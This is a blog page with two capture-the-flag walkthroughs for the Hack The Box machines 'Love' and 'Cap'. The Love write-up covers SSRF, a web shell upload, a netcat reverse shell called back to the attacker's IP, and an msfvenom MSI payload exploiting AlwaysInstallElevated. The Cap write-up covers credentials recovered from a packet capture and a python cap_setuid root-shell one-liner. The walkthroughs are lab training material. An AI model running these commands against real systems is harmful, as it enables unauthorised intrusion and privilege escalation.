Sunday, August 8, 2021

Love | Hack The Box (HTB) | CTF Walkthrough

Welcome Back! Let's continue with our exploration of Hack the Box (HTB) machines. Love is an easy-rated windows-based box. With that said, let us begin.


Contents
1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation

  1. Scanning
As usual, let's start with Nmap scan to learn more about the services that are running on this machine.
Nmap - One of the most popular port scanner tool which allows us to discover all active ports and services that are running on the target network.
We have 7 ports open, and we can also see some of the domains "staging.love.htb" and "www.love.htb" listed in the Nmap scan.

nmap -sC -sV 10.10.10.239

Exhibit 1
  1. Enumeration
First, let's see what is running on port 80. We have a Voting System asking for credentials to login as shown in the below Exhibit 2.

Exhibit 2

Let’s enumerate the webserver using Dirb. Dirb/Dirbuster is a tool to brute force any directory based on wordlists.
Exhibit 3

Wow, there are a whole lot of directories. The /admin directory seems like an admin panel for the Voting system. But we have not retrieved credentials for admin and default admin passwords are not working. So let us see what the other ports have for us.

When browsing the web service on port 5000, we get :
Exhibit 4


From the Nmap result, we got some interesting subdomains. Let's add this to our /etc/hosts file. We have a sub-domain "staging.love.htb" and "www.love.htb" as shown in the below Exhibit 5.

Exhibit 5

Let us visit staging.love.htb. We have a Free File Scanner hosted in this server as shown in the below Exhibit 6.
Exhibit 6

We have got a page where we can specify the file URL for it to scan.

Exhibit 7

When we provide a URL and click on "Scan file", the server actually displays the website's response.

Since the web service on port 5000 is forbidden to us, maybe we can access it via this. File Scanner service and the port 5000 web service are running on the same server, we might be able to access it via localhost. It is like we are making the server request the service on another port that is running on the same machine also known as Server Side Request Forgery (SSRF).

Exhibit 8

Great! And this time, we are successful in making the request and it reveals some credentials.

User = "admin"
Pass = "@LoveIsInTheAir!!!!"

I tried logging into all the portals we had and finally got access to the admin dashboard.

Exhibit 9

Exhibit 10

When browsing the admin dashboard, I found the profile updating option allowing us to upload a file to the server. How about we try to upload a shell?

Exhibit 11

It looks like we are successful in uploading the shell. The uploaded file was found in /images.  folder.

Exhibit 12

Let's try and run a simple command "whoami" and the server is giving the response.

Exhibit 13

Now it's time to get the reverse shell, let's try simple and upload a nc.exe file in the server in the same way we uploaded our shell.

Exhibit 14

As shown in Exhibit, we can see our file nc.exe is uploaded.

Exhibit 15

Now we need to set up a listener and execute the below command.

#Netcat Listener
nc -nvlp 8888
#Execute netcat command
http://10.10.10.239/images/jagskap.php?cmd=nc.exe%2010.10.15.4%208888%20-e%20cmd.exe

Exhibit 16

Congrats!! We have a shell as user phoebe and we can read the user flag now.
  • Privilege Escalation
Let us begin with WinPEAS.

WinPEAS is a script that searches for possible paths to escalate privileges on Windows hosts. Upload the file to the server and just run the binary.

Exhibit 17

This will produce a pretty large output. Save the output on a file and for analyzing.

When analyzing, the main part where we might be interested in is :

Exhibit 18

We can see that the AlwaysInstallElevated is set to 1. This means we can install an MSI file with elevated privileges as an administrator. This might be a way to get an administrator on the system.

First, let us create a MSI package that will give us a reverse shell using "msfvenom".

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.15.4 LPORT=7777 -f msi -o reverse.msi

Exhibit 19

Now copy/upload the file to the remote box.

Exhibit 20

Let's set up a listener on the specified port and execute the MSI file using the command below -

# Cross your fingers and listen on netcat
nc -nvlp 7777
# Execute msi file
msiexec /quiet /qn /i reverse.msi

Exhibit 21

BINGO!! And here we get administrator on the system and we have the root flag.

Exhibit 22

Thus, LOVE from HackTheBox has been rooted.

Thanks for reading this far. I hope you liked it.

Wednesday, August 4, 2021

Cap | Hack The Box (HTB) | CTF Walkthrough

Hi Guys!! In this blog we will cover the HTB CTF challenge machine named "Cap" which is an easy machine. Capture the flag (CTF) challenge/games can help you understand many aspects of information security. CTF/HTB challenges are full of learning on new vulnerabilities, RCE, Privilege Escalation, etc.

Contents

1. Scanning
2. Enumeration
3. Exploiting
4. Privilege Escalation


  1. Scanning
First step would be to scan the ports and services running in the target network. One of the most popular port scanner tool is Nmap which allows the attacker to discover all active ports and services running on the target network. Exhibit 1 shows that port 21, 22 and 80 are opened.

nmap -sC -sV 10.10.10.245

Exhibit 1
  1. Enumeration
If you run script (-sC) in nmap or check anonymous login manually, it shows we don’t have access to anonymous ftp.

Exhibit 2

Let's run Nikto and Dirb to see if we get any additional information.

Nikto is a command-line vulnerability scanner that scans web-servers  for dangerous files/CGIs, outdated server software and other problems.

nikto -h http://10.10.10.245/

Exhibit 3

Dirb/Dirbuster is a tool to brute force any directory based on wordlists.

dirb http://10.10.10.245

Exhibit 4

When browsing the website, it displays the result of monitoring of the network. On the left sidebar menu, we can see 5 second PCAP (packet capture) Analysis. The PCAP files contains the data/packets sent over a network.

Exhibit 5

We can also download these files and analysis them later.

Exhibit 6

When browsing http://10.10.10.245/data/4, the application didn’t show any packets. So, I changed the path parameter from 4 to 0.

Exhibit 7

Fortunately, it worked. If it hadn’t worked, we would have start fuzzing rather than testing one by one. Let's downloaded the pcap file and open it in wireshark.

Exhibit 8

We can see the user and password when analysing the 0.pcap.
  1. Exploiting
Let's use the credentials we found in FTP. Credentials are working and we can see user.txt file as well.

Exhibit 9

Let's try to log in to SSH with the same credentials.

ssh nathan@10.10.10.245

Exhibit 10

Congrats, We got the user access and the user’s flag in the home directory.

cat user.txt
  1. Privilege Escalation
Next, when enumerating ways for privilege escalation I found setuid capabilities that could escalate the privileges by giving us the root shell. As shown in the below Exhibit we have cap_setuid available or the python3.8 binary on the target.

getcap -r / 2>/dev/null

Exhibit 11

If the binary has the Linux CAP_SETUID capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.

A quick search on the capabilities led to the command to execute for root shell.

// https://gtfobins.github.io/gtfobins/python/#capabilities
python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

BINGO!!! As shown in Exhibit 12, we executed the above command and got the root shell.

Exhibit 12


Hope you learned and enjoyed it!!